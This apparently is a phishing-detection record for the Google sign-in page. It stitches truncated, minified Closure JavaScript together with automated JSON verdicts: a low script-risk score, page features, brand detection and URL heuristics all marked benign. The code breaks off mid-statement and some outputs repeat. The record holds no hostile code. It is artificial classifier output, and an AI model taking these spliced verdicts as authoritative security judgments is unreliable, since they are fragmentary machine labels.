"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;
try{
var vua=function(a,b){this.da=a;this.fa=b;if(!c){var c=new _.cg("//www.google.com/images/cleardot.gif");_.Im(c)}this.oa=c};_.h=vua.prototype;_.h.qd=null;_.h.E0=1E4;_.h.pC=!1;_.h.nT=0;_.h.xM=null;_.h.wX=null;_.h.setTimeout=function(a){this.E0=a};_.h.start=function(){if(this.pC)throw Error("vc");this.pC=!0;this.nT=0;wua(this)};_.h.stop=function(){xua(this);this.pC=!1};
var wua=function(a){a.nT++;navigator!==null&&"onLine"in navigator&&!navigator.onLine?_.kn((0,_.Mg)(a.JJ,a,!1),0):(a.aa=new Image,a.aa.onload=(0,_.Mg)(a.Tma,a),a.aa.onerror=(0,_.Mg)(a.Sma,a),a.aa.onabort=(0,_.Mg)(a.Rma,a),a.xM=_.kn(a.Uma,a.E0,a),a.aa.src=String(a.oa))};_.h=vua.prototype;_.h.Tma=function(){this.JJ(!0)};_.h.Sma=function(){this.JJ(!1)};_.h.Rma=function(){this.JJ(!1)};_.h.Uma=function(){this.JJ(!1)};
_.h.JJ=function(a){xua(this);a?(this.pC=!1,this.da.call(this.fa,!0)):this.nT<=0?wua(this):(this.pC=!1,this.da.call(this.fa,!1))};var xua=function(a){a.aa&&(a.aa.onload=null,a.aa.onerror=null,a.aa.onabort=null,a.aa=null);a.xM&&(_.ln(a.xM),a.xM=null);a.wX&&(_.ln(a.wX),a.wX=null)};var yua=function(){_.gn.call(this);this.aa=new vua(this.Xma,this);this.fa=51E3+Math.round(18E3*Math.random())};_.J(yua,_.gn);_.h=yua.prototype;_.h.Xma=function(a){this.yW=Date.now();this.J5(a)};_.h.J5=function(a){this.v5=a;this.dispatchEvent("g")};_.h.qd=null;_.h.yW=0;_.h.v5=!0;var zua=function(){this.aa=new yua};_.Pe(_.Bn,zua);_.Cb().jl(function(a){var b=new zua(a);_.Dp(a,_.Bn,b)});
_.k("byfTOb");

_.l();
_.k("lsjVmc");
var js=function(a,b){b=b===void 0?!0:b;_.li.call(this);this.Ba=a;this.da=new _.is(this);b&&_.Aua(this);_.Ig(this,this.da)};_.ks=function(a){this.Ha=_.u(a,0,_.ks.messageId)};_.J(_.ks,_.w);_.ks.prototype.zy=_.ba(40);_.ks.messageId="xsrf";_.Bua=new _.Qk(48448350,_.ks);_.ji(js,_.li);js.prototype.aa=null;js.prototype.fa="at";js.prototype.oa=null;_.Aua=function(a){var b=a.Ba.get(_.Sl);b.Ba.includes(a.da);b.oa(a.da)};js.prototype.configure=function(a,b,c){this.aa=a;this.oa=b;c&&(this.fa=c)};_.is=function(a){this.fa=a};_.ji(_.is,_.Sf);_.is.prototype.aa=_.ba(15);_.is.prototype.da=_.ba(18);_.Pe(_.Cn,js);_.Cb().jl(function(a){var b=new js(a,!1);_.Dp(a,_.Cn,b);b.configure(_.Ie("SNlM0e").string(null),_.Ie("S06Grb").string(null))});
_.l();
_.lf.prototype.rO=_.ca(6,function(){return this.kx});_.ls=function(a){var b=a.Yd().rO();if(b==null||b<0)return null;var c=_.Bl[b];if(c){var d=Object.values(c)[0],e=_.jm(a,_.am);c=_.jm(a,_.Jka);var f=_.jm(a,_.bm),g=_.jm(a,_.cm),m=_.jm(a,_.Kka);b=_.Al[b];a={Gn:d,Js:b?Object.values(b)[0]:void 0,request:a.wi(),sD:!!e};f&&(a.a2=f);g&&(a.b2=g);c&&(a.hB=c);m&&(a.uP=m);return a}return(c=_.Cl[b])?(c=Object.values(c)[0],b=_.Dl[b],{Gn:b?Object.values(b)[0]:void 0,mB:c,YW:a.wi()}):null};
_.Cua=function(a){return _.Ec(function(b){return b instanceof a&&!_.jc(b.Ha)})};_.Dua=function(a,b){a.sort(b||_.Na)};_.ms=function(a,b){b in a&&delete a[b]};_.ns=function(a,b){return a!==null&&b in a?a[b]:void 0};_.Ln.prototype.FD=_.ca(21,function(){for(var a={},b=this.getAllResponseHeaders().split("\r\n"),c=0;c<b.length;c++)if(!_.aj(b[c])){var d=_.oka(b[c],":",1),e=d[0];d=d[1];if(typeof d==="string"){d=d.trim();var f=a[e]||[];a[e]=f;f.push(d)}}return _.Fb(a,function(g){return g.join(", ")})});
_.Jn.prototype.Qm=_.ca(20,function(){return _.nk(this,3)});_.Eua=function(a,b){return _.ue(a,2,b)};_.Fua=function(a){var b=a.type;if(typeof b==="string")switch(b.toLowerCase()){case "checkbox":case "radio":return a.checked?a.value:null;case "select-one":return b=a.selectedIndex,b>=0?a.options[b].value:null;case "select-multiple":b=[];for(var c,d=0;c=a.options[d];d++)c.selected&&b.push(c.value);return b.length?b:null}return a.value!=null?a.value:null};
_.os=function(a){_.li.call(this);this.pb=a;this.oa={}};_.ji(_.os,_.li);var Gua=[];_.os.prototype.listen=function(a,b,c,d){Array.isArray(b)||(b&&(Gua[0]=b.toString()),b=Gua);for(var e=0;e<b.length;e++){var f=_.an(a,b[e],c||this.ha

```json
{
    "risk_score": 1,
    "reasoning": "The script appears to be part of a larger library or framework, likely related to Google's Closure Library, as indicated by the copyright notices. It does not exhibit any high-risk behaviors such as dynamic code execution, data exfiltration, or redirects to suspicious domains. The code is not obfuscated, and there are no external data transmissions or aggressive DOM manipulations. The presence of legacy practices or tracking behavior is not evident. Overall, the script seems benign and is likely part of a legitimate library."
}

"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;
try{
_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x24a60d89, 0x1be1, 0x6970ff1, 0x12280dd0, 0x6420, 0x0, 0x2c000000, 0x2c000001, 0xc3, ]);
/*

 Copyright The Closure Library Authors.
 SPDX-License-Identifier: Apache-2.0
*/
/*

 Copyright Google LLC
 SPDX-License-Identifier: Apache-2.0
*/
/*

 Copyright 2024 Google, Inc
 SPDX-License-Identifier: MIT
*/
/*
 SPDX-License-Identifier: Apache-2.0
*/
/*
 Copyright The Closure Library Authors.
 SPDX-License-Identifier: Apache-2.0
*/
var baa,daa,Qa,Ua,gaa,iaa,jb,qaa,xaa,Ab,Jaa,Laa,Oaa,Mb,Paa,Sb,Ub,Vb,Qaa,Raa,Wb,Saa,Taa,Uaa,$b,Zaa,aba,hc,fba,hba,iba,qc,rc,mba,nba,pba,rba,sba,wba,zba,tba,yba,xba,vba,uba,Aba,Bba,Cba,Jba,Mba,Oba,Pba,Lba,Rba,Oc,Tba,Vba,aca,bca,cca,dca,eca,fca,Zba,$ba,lca,oca,qca,rca,sca,tca,wca,yca,xca,Aca,Cd,Bd,Cca,Bca,Fca,Eca,Hca,Jca,Kca,Mca,Jd,Nca,Oca,Pca,Od,Vca,Wca,ae,Xca,Nd,Pd,bda,le,gda,ada,hda,jda,kda,nda,qda,rda,sda,vda,Nda,Tda,Me,Vda,Ne,Wda,aea,kea,mea,nea,oea,qea,uea,vea,wea,xea,Aea,Cea,Iea,Mea,Nea,Oea,Yea,
Uea,bfa,afa,fg,efa,ig,gfa,hfa,ifa,nfa,tfa,rfa,xfa,yfa,zfa,Bfa,Cfa,Dfa,Gfa,Hfa,Nfa,Pfa,Qfa,Sfa,Tfa,Ufa,Vfa,Wfa,Xfa,Zfa,$fa,bga,fga,gga,iga,ah,bh,nga,pga,qga,rga,sga,uga,ch,wga,xga,eh,yga,zga,Aga,Dga,Ega,Fga,Iga,Jga,Kga,Oga,Sga,aaa,Yga,Fh,Zga,Hh,$ga,aha,bha,Lh,Ph,gha,lha,kha,Zh,nha;_.ba=function(a){return function(){return aaa[a].apply(this,arguments)}};_.ca=function(a,b){return aaa[a]=b};_.ha=function(a){_.fa.setTimeout(function(){throw a;},0)};_.ja=function(a){a&&typeof a.dispose=="function"&&a.dispose()};
baa=function(a){for(var b=0,c=arguments.length;b<c;++b){var d=arguments[b];_.ka(d)?baa.apply(null,d):_.ja(d)}};_.la=function(a,b){if(Error.captureStackTrace)Error.captureStackTrace(this,_.la);else{var c=Error().stack;c&&(this.stack=c)}a&&(this.message=String(a));b!==void 0&&(this.cause=b);this.aa=!0};_.ma=function(a){return a[a.length-1]};_.na=function(a,b,c){for(var d=typeof a==="string"?a.split(""):a,e=a.length-1;e>=0;--e)e in d&&b.call(c,d[e],e,a)};
_.pa=function(a,b,c){b=_.oa(a,b,c);return b<0?null:typeof a==="string"?a.charAt(b):a[b]};_.oa=function(a,b,c){for(var d=a.length,e=typeof a==="string"?a.split(""):a,f=0;f<d;f++)if(f in e&&b.call(c,e[f],f,a))return f;return-1};_.ra=function(a,b){return(0,_.qa)(a,b)>=0};_.sa=function(a){if(!Array.isArray(a))for(var b=a.length-1;b>=0;b--)delete a[b];a.length=0};_.ua=function(a,b){_.ra(a,b)||a.push(b)};_.Ba=function(a,b){b=(0,_.qa)(a,b);var c;(c=b>=0)&&_.wa(a,b);return c};
_.wa=function(a,b){return Array.prototype.splice.call(a,b,1).length==1};_.Ca=function(a){return Array.prototype.concat.apply([],arguments)};_.Da=function(a){var b=a.length;if(b>0){for(var c=Array(b),d=0;d<b;d++)c[d]=a[d];return c}return[]};_.Ga=function(a,b){for(var c=1;c<arguments.length;c++){var d=arguments[c];if(_.ka(d)){var e=a.length||0,f=d.length||0;a.length=e+f;for(var g=0;g<f;g++)a[e+g]=d[g]}else a.push(d)}};
_.caa=function(a,b,c){return arguments.length<=2?Array.prototype.slice.call(a,b):Array.prototype.slice.call(a,b,c)};_.Ka=function(a,b){b=b||a;for(var c=0,d=0,e={};d<a.length;){var f=a[d++],g=_.Ha(f)?"o"+_.Ja(f):(typeof f).charAt(0)+f;Object.prototype.hasOwnProperty.call(e,g)||(e[g]=!0,b[c++]=f)}b.length=c};_.La=function(a,b){if(!_.ka(a)||!_.ka(b)||a.length!=b.length)return!1;for(var c=a.length,d=daa,e=0;e<c;e++)if(!d(a[e],b[e]))return!1;return!0};_.Na=function(a,b){return a>b?1:a<b?-1:0};
daa=function(a,b){return a===b};_.eaa=function(a,b){var c={};(0,_.Oa)(a,function(d,e){c[b.call(void 0,d,e,a)]=d});return c};Qa=function(a){return a.toString().indexOf("`")===-1};_.Ta=function(a){return new _.Ra(_.Sa,a[0].toLowerCase())};Ua=function(a){return{valueOf:a}.valueOf()};gaa=function(){var a=null;if(!faa)return a;try{var b=function(c){return c};a=faa.createPolicy("AccountsSignInUi#html",{createHTML:b,createScript:b,create

{
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Next",
"text_input_field_labels": [
"Email or phone"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
}

{
  "brands": [
    "Google"
  ]
}

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": true,
    "brand_spoofing_attempt": false,
    "third_party_hosting": false
}

URL: https://google.com

{
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Next",
"text_input_field_labels": [
"Email or phone"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
}

{
  "brands": [
    "Google"
  ]
}